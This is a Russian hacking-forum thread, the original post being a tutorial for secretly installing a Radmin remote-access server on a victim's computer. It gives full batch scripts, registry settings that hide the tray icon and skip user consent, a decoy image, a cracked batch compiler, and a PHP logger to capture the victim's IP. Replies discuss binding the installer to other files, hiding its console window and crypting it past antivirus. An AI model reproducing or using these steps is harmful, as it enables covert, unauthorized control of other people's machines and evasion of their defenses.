Скрытая установка сервера Radmin.

Тема в разделе "Статьи", создана пользователем onthar, 29 дек 2008.

  1. onthar
    onthar Продвинутый
    Симпатии:
    224
    Еще один способ скрыто установить сервер радмина на целевой машине.
    мануал в честь нового года специально для xaker.name и grabberz.com.​

    В архиве имеется все необходимое:
    AdmDll.dll, raddrv.dll - необходимые, для работы радмина, библиотеки.
    svhost.exe - собственно, сам сервер радмина.
    1.jpg - просто пикча, которая откроется после запуска билда сервера.
    111.bat, 111.reg - в этих файлах записаны все настройки устанавливаемого сервера.
    radmin_viewer.exe программа для подключения к серверу radmin.
    quickbfc_installer - инстольник программы, для конвертирования батников в *.exe, Quick Batch File Compiller. (и кряк к ней quick.batch.file.compiler.2.1.5.0-patch.exe)
    Теперь идем в папку со всем этим добром. рассмотрим файл Source.bat
    Видим в нем слуедующий код:
    Код:
    mkdir %SYSTEMROOT%\system32\administration_assembly\access_protocol
    copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe"
    copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/raddrv.dll"
    copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/AdmDll.dll"
    copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/111.bat"
    copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/111.reg"
    netsh firewall add portopening protocol = TCP port = тут_указывайте_свой_порт name = TCP
    reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
    reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
    reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg
    regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg
    "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence
    "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:тут_указывайте_свой_пароль /port:тут_указывайте_свой_порт
    "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /start
    "%MYFILES%\1.jpg"
    
    Тут редактируем создаваемые пути/фалы на свой вкус.
    Этот код, его и надо компилировать в экзешник, собственно скопирует файлы из папки "Files"(имеет переменное значение %MYFILES%) в указанную папку. В моем примере %SYSTEMROOT%\system32\administration_assembly\access_protocol

    Дальше рассмотрим файл 111.reg
    В нем мы наблюдаем такой код:
    Код:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
    "NTAuthEnabled"=hex:00,00,00,00
    "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
    "DisableTrayIcon"=hex:01,00,00,00
    "Port"=hex:23,13,00,00
    "EnableLogFile"=hex:00,00,00,00
    "LogFilePath"="c:\\logfile.txt"
    "FilterIp"=hex:00,00,00,00
    "AskUser"=hex:00,00,00,00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
    "Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
      18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
      1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
    Дальше файл 111.bat:
    Код:
    netsh firewall add portopening protocol = TCP port = тут_порт name = TCP
    reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
    reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
    copy /y "svchost.exe" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe"
    copy /y "raddrv.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/raddrv.dll"
    copy /y "AdmDll.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/AdmDll.dll"
    reg import 111.reg
    regedit /s 111.reg
    "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /install /silence
    "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /save /silence /pass:тут_пароль /port:тут_порт
    "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /start
    echo #### COMPLETE #######
    
    По сути повторяет содержимое Source.bat, этот батник содержит параметр запуска сервера, а не всего файла..

    Теперь редактируем все эти файлы на свой вкус. Внимание! Все пароль и порт должны совпадать. Так же, во всех файлах пути к директории для установки сервера не должны отличаться.

    Для начала нам нужно перекомпилировать батник Source.bat в *.exe.
    В архиве лежит инстольник проги quick batch file compiler 2.1.5.0 (quickbfc_installer.exe) и кряк к ней (quick.batch.file.compiler.2.1.5.0-patch.exe)
    Устанавливаем, патчим, открываем и копируем в него содержимое файла Source.bat.
    Дальше щелкаем вкладку Include,
    выбираем все файлы из папки "Files".
    Нажимаем Build, вводим имя нашего финального файла, сохраняем.
    [​IMG]
    Вот собсна и все.

    Теперь осталось только закинуть жертве файл и узнать ее ип.
    Тут уж каждый придумает свой способ, но могу порекоммендовать следующий код на пхп, чтобы узнать Ip-адрес:
    PHP:
    <?
    $a = $_SERVER['REMOTE_ADDR'];
    $b = $_SERVER['HTTP_USER_AGENT'];
    $c = @$_SERVER['HTTP_REFERER'];
    $d = $_SERVER['SERVER_PORT'];
    $e = $_SERVER['HTTP_HOST'];
    $af = $_ENV['USERNAME'];

    $count1=" IP: $a br: $b ot: $c p: $d h: $e us: $af \n";
    $f=fopen("log.txt","a+");
    fwrite($f,$count1);
    fclose($f);
    ?> 
    Предворительно создадим файл log.txt в папке со скриптом на сервере и дадим права на запись.
    При обращении к странице с этим скриптом в файл log.txt будет записана информация о посещении (в частности IP-адрес).

    Узнали ип. Берем Radmin_viewer вводим ип, пароль и вуаля - нам открыт доступ.
    На этом все.

    ЗЫ
    На кряк к проге сильно ругаются антивирусы. Так как другого не нашел, выкладываю этот, запускаем на свой страх и риск.

    В кодах возможны противошкольниковые ошибки;)

    Код открыт, возможностей море - это самый примитивный вариант, можно довести все до намного более высокого уровня срытности


    мануал в честь нового года специально для xaker.name и grabberz.com.
    -------------------------------------------------------------------------
    Скачать необходимый софт.
    Pass:
    Код:
    xaker.name&grabberz.com
    Onthar​
     
    Последнее редактирование модератором: 5 янв 2017
    29 дек 2008
    3 пользователям это понравилось.
  2. White-Power
    White-Power Guest
    Отличная статья !!!!
    Есть уже готовый, Radmin 3.2
    Скрытый установщик Radmin'а- программы для удаленного администрирования. Для установки достаточно запустить файл, он пропишет Radmin в список исключений в Windows Security Center, скроет иконку из трея, пропишет активационный ключ.
    Т.к. Radmin не является вирусом, антивирусы не ругаются на файл.

    //Ссылки удалил. Некоторые индивидуумы после прочтения первого поста качают эту херню и у них ничего не получается естессно.

    Пароль для соединения: privedmidved (вводится в программе Radmin Viewer)
    Установщиком является файл urc.exe
     
    Последнее редактирование модератором: 14 янв 2009
    29 дек 2008
    1 человеку нравится это.
  3. onthar
    onthar Продвинутый
    Симпатии:
    224
    White-Power,
    то что ты выложил ставится само, и пойди пойми, как она мусорит в реестре, что создает и что куда дропает.

    В варианте из первого поста все коды открыты, все файлы взяты из радмина 2-версии. Все процессы, что и как делает программа настраиваемы и просматриваемы.

    ЗЫ. Тот скрытый радмин я уже выкладывал.
     
    29 дек 2008
  4. seven
    seven Guest
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    seven,
    пиздец статья..

    Вы с White-Power чувствуете разницу между готовой сборкой и маном по собственной настройке, подробно расписанной?
     
    31 дек 2008
  6. wriwel
    wriwel Guest
    onthar,
    The new generation manually does not wish to do..
     
    31 дек 2008
  7. kimpasiplus
    kimpasiplus Новичок
    Симпатии:
    0
    onthar скажи пожалуйста их надо редактировать
     
    28 янв 2009
  8. onthar
    onthar Продвинутый
    Симпатии:
    224
    на твое усмотрение.
     
    28 янв 2009
  9. Kharek
    Kharek Новичок
    Симпатии:
    1
    Скажите пожалуйста как отредактировать код
    Код:
    "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c, 77,92,11,f4,ce,1a
    Т.е. с помощью какой программы можно перевести желаемый текстовый пароль в шестнадцатиричный код?

    Добавлено через 13 часов 19 минут
    Предыдущий вопрос решил с помощью этого сайта
    У меня возник следующий вопрос: у вас в коде в файле Source.bat указан следующий адерес:
    Код:
    /help/Tours/nnTour/111.reg
    У меня же этот адрес выглядит так:
    Код:
    \Help\Tours\mmTour
    Это ваша ошибка с буквами nn и mm в адресе или это у меня этот адрес изменен?
    И еще: сделаный exe-шник я сшил джойнером с другим, но во время его запуска появляется окно командной строки, т.е. эта установка видна. Как сделать, чтобы окно не выводилось на экран?
    Также хотел узнать: зачем нужно чтобы запускалась пикча из файла 1.jpg?
     
    Последнее редактирование: 1 фев 2009
    1 фев 2009
  10. onthar
    onthar Продвинутый
    Симпатии:
    224
    Kharek,
    калькулятором виндозным.
    Там есть 2,8,10,16-ричные системы счисления.
     
    1 фев 2009
  11. Kharek
    Kharek Новичок
    Симпатии:
    1
    Попробовал поменять буквы nn на mm в адресе, но все равно выдает ошибки. Вот полное содержимое текста в командной строке:
    Код:
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>mkdir C:\WINDOWS\sy
    stem32\administration_assembly\access_protocol
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>copy /y "C:\DOCUME~
    1\Admin\LOCALS~1\APPLIC~1\svchost.exe" "C:\WINDOWS/system32/administration_assem
    bly/access_protocol/svchost.exe"
    Скопировано файлов:         1.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>copy /y "C:\DOCUME~
    1\Admin\LOCALS~1\APPLIC~1\raddrv.dll" "C:\WINDOWS/system32/administration_assemb
    ly/access_protocol/raddrv.dll"
    Скопировано файлов:         1.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>copy /y "C:\DOCUME~
    1\Admin\LOCALS~1\APPLIC~1\AdmDll.dll" "C:\WINDOWS/system32/administration_assemb
    ly/access_protocol/AdmDll.dll"
    Скопировано файлов:         1.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>copy /y "C:\DOCUME~
    1\Admin\LOCALS~1\APPLIC~1\111.bat" "C:\WINDOWS/system32/administration_assembly/
    access_protocol/111.bat"
    Скопировано файлов:         1.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>copy /y "C:\DOCUME~
    1\Admin\LOCALS~1\APPLIC~1\111.reg" "C:\WINDOWS/system32/administration_assembly/
    access_protocol/111.reg"
    Скопировано файлов:         1.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>netsh firewall add
    portopening protocol = TCP port = 4899 name = TCP
    Служба не запущена.
    
    
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>reg export "HKEY_LO
    CAL_MACHINE\SYSTEM\RAdmin" 123.reg
    
    Ошибка: Системе не удалось найти указанный раздел или параметр реестра
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>reg delete  "HKEY_L
    OCAL_MACHINE\SYSTEM\RAdmin" /f
    
    Ошибка: Системе не удалось найти указанный раздел или параметр реестра
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>reg import "C:\WIND
    OWS/help/Tours/mmTour/111.reg
    
    Ошибка: Недопустимый формат файла.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>regedit /s "C:\WIND
    OWS/help/Tours/mmTour/111.reg
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>"C:\WINDOWS/help/To
    urs/mmTour/svchost.exe" /install /silence
    ""C:\WINDOWS/help/Tours/mmTour/svchost.exe"" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>"C:\WINDOWS/help/To
    urs/mmTour/svchost.exe" /save /silence /pass:parol /port:4899
    ""C:\WINDOWS/help/Tours/mmTour/svchost.exe"" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    
    D:\Рабочий стол\Софт\Хакинг\Скрытая установка сервера RAdmin>"C:\WINDOWS/system3
    2/administration_assembly/access_protocol/svchost.exe" /start
    Т.е., как я понял данные в реестр не заносятся, поэтому у меня светится в трее иконка, пробовал законектиться к себе же - конектится без запроса пароля. Буду благодарен вашей помощи.
     
    1 фев 2009
  12. invizhack
    invizhack Новичок
    Симпатии:
    0
    не мог ли бы выложить radmin 3,2?
     
    18 фев 2009
  13. onthar
    onthar Продвинутый
    Симпатии:
    224
  14. invizhack
    invizhack Новичок
    Симпатии:
    0
    вот тоже радмин, сервер 2,0.. токо сервер всего один файл, который прописывается в реестр, так же не виден в трее... вообщем тоже самое что описано в первом посте, токо СЕРВЕР ИДЁТ один файлом!
    скачать
     
    18 фев 2009
  15. Красно-Белый
    Красно-Белый Новичок
    Симпатии:
    0
    При запуске палится ADMDLL.dll
     
    20 фев 2009
  16. onthar
    onthar Продвинутый
    Симпатии:
    224
    а ты как думал. Радмин уже начал определяться как утилита удаленного администрирования.
     
    20 фев 2009
  17. Slava11
    Slava11 Новичок
    Симпатии:
    0
    Всё работат спасибо
     
    20 фев 2009
  18. Красно-Белый
    Красно-Белый Новичок
    Симпатии:
    0
    onthar,
    Как можно сделать что б эта длл'ка не палилась?
     
    20 фев 2009
  19. onthar
    onthar Продвинутый
    Симпатии:
    224
    чистить сигнатуры, криптовать. Работоспособность может убиться.
     
    20 фев 2009
  20. Красно-Белый
    Красно-Белый Новичок
    Симпатии:
    0
    У меня авира не палит радмина. Spyware Terminator блокирует эту ддл'ку
    покер нахом пробывал криптовать всё равно ддл'ка палится
     
    20 фев 2009
Загрузка...